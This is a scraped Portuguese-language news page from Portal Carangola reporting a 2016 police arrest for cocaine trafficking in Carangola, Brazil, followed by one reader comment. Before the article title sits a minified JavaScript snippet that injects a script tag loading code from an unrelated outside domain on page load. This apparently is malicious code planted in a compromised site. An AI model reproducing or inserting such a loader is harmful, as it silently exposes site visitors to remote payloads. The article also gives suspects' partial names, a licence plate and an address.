;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PM de Carangola prende autores de tráfico ilícito de drogas. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

PM de Carangola prende autores de tráfico ilícito de drogas.

Em 16/03/2016 a Polícia Militar compareceu na Avenida Capitão Antônio Carlos de Souza, nº 455, em Santa Maria, Carangola. Avistaram a motocicleta Honda CG 150 Sport, cor vermelha, HFA-9460, com dois ocupantes, e ao procederem abordagem o passageiro o mesmo correu e arremessou um objeto, de tamanho considerável, em um depósito de material de construção. o condutor E.G.G., 30 anos, e o passageiro M.O.M, vulgo “Strabilac”, 33 anos, foram contidos, e realizada varredura foi localizado um volume grande de cocaína (300 gramas) envolta em fita adesiva. Michel confirmou a propriedade da droga, e que comprou por R$2.000,00 na Cidade de Fervedouro de um indivíduo de nome “Tião”, e revenderia para usuários. O condutor da motocicleta não possuía CNH e a motocicleta não se encontra devidamente licenciada, sendo removida para o pátio credenciado.Salienta-se que Eraldo se encontra em beneficio de saída temporária tendo que retornar dia 17/03/2016. Foi dada voz de prisão aos autores e conduzidos à DEPOL.

One thought on “PM de Carangola prende autores de tráfico ilícito de drogas.

  1. Parabéns para a polícia, o mais importante é o povo participar em denunciar estes vagabundos que destrói os nossos jovens.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.